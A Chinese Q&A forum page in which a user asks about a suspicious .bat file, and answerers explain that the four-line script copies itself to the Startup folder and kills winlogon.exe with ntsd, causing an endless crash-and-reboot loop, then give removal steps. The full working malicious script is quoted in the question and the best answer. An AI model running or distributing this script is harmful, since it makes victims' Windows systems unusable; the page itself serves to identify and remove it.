永发信息网

这个bat文件是做什么用的?

答案:4  悬赏:10  手机版
解决时间 2021-02-04 02:48
我用记事本打开,看到了以下内容:

@echo off
set var=%userprofile%\「开始」菜单\程序\启动
xcopy/y %0 "%var%"\
cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul

如果这个文件是病毒的话,那运行后如何解决呢?
最佳答案
绝对的病毒,不过也不能说是病毒,因为它没有传染性。属于恶意程序!

@echo off
::第一句没有什么含义。
set var=%userprofile%\「开始」菜单\程序\启动
::设置变量var为=%userprofile%\「开始」菜单\程序\启动 ,看到了吧,这里是开始菜单的启动文件夹。
xcopy/y %0 "%var%"\
复制自身到上面设置的地方,也就是开始菜单的启动文件夹
cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul
这里是结束winlogon.exe进程,如一楼所说,这是系统的核心进程,结束之后会崩溃或者是60秒倒计时关机,总之你必须重启。问题就出来了,重启之后系统还要执行开始菜单的启动文件夹的这个文件,所以它又会结束进程,继续重启。周而复始,永远无法用系统。
----好恶毒的制造者啊!
解决方法:你只要到“开始--程序--启动”里面删除那个.bat文件就可以了,但是如果你已经中招了,你只有进dos或者win pe系统删了,当然如果是60秒倒计时关机,你可以让系统启动以后立刻进入cmd。如下:
开始--运行--输入“cmd”确定---输入“shutdown -a”回车(注意shutdown后面有个空格)。
然后到上面的地方删除那个恶毒程序即可!
全部回答
至少是恶意的,只需要看组后一句 cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul 这一行是让NTSD在CMD运行,NTSD是用来杀进程的,WINLOGON.EXE是WINDOWS的核心进程之一,一旦杀掉系统肯定会立即崩溃。
在del里 /f, 强制删除只读文件 /a,根据指定的属性删除文件 /q,指定静音状态。不提示您确认删除。 %1,变量1 \\?\%1,变量1指定的绝对路径及文件 unc路径的一个特例。unc路径就是符合 \\servername\sharename 格式,其中 servername 是服务器名,sharename 是共享资源的名称。?是统配符,表示匹配0个或1个任意字符。使用unc路径不会捡测路径中的保留字设备名称等,因此可以用这种方法来删除特殊文件或目录。 ?\可以理解成遍历,?是统配符,表示匹配0个或1个任意字符。 .\代表本地节点,在概念上来有点像磁盘根目录,也可以说成是计算机根目录。
是病毒文件。。。
我要举报
如以上问答信息为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
大家都在看
苏宁电器(天津红旗路店)地址在什么地方,想过
逆战黄色字体怎么打出来的
天秤男爱天蝎女的表现
社区卫生服务的特点包括A.广泛性B.综合性C.阶
问两首歌,一首是日文歌,讲的是一个女的和男
服装品牌的未来发展规划应写哪几点?
时代数码广场地址在什么地方,想过去办事
t134硬卧10车8号上铺中铺下铺
商丘市盐业总公司盐业分公司地址在哪,我要去
小城镇的有一块土地性质是商住,能交易吗?需
注册贸易公司需要多大面积的办公场地
新疆美食地址在什么地方,想过去办事
求36v电动车电路图
对A、B两个互斥方案进行选择时,不宜采用的方
中国电信陈桥天翼手机卖场地址在什么地方,想
推荐资讯
我刚买了辆车,前挡风玻璃上贴着吉林银行质押
请阅读下列资料,回答相关问题资料一:一粒桃
《跪下给劳资,唱征服》的歌词
侯家庙乡中心幼儿园这个地址在什么地方,我要
遇见cafe&Bar地址在什么地方,想过去办事
斗鱼 怎么用手机直播狼人杀
圣诞节的由来!!!简捷一点啊,100字左右就够了
手机淘宝怎么样查看淘宝卖家的等级(举个例子
大神帮帮忙,zemax,非序列,光线经平凸透镜
情赶走爱不惜再何鸣回头难是什么意思
城区阳泉艺名美业地址在哪里啊
面包新语 安亭店怎么样
正方形一边上任一点到这个正方形两条对角线的
阴历怎么看 ?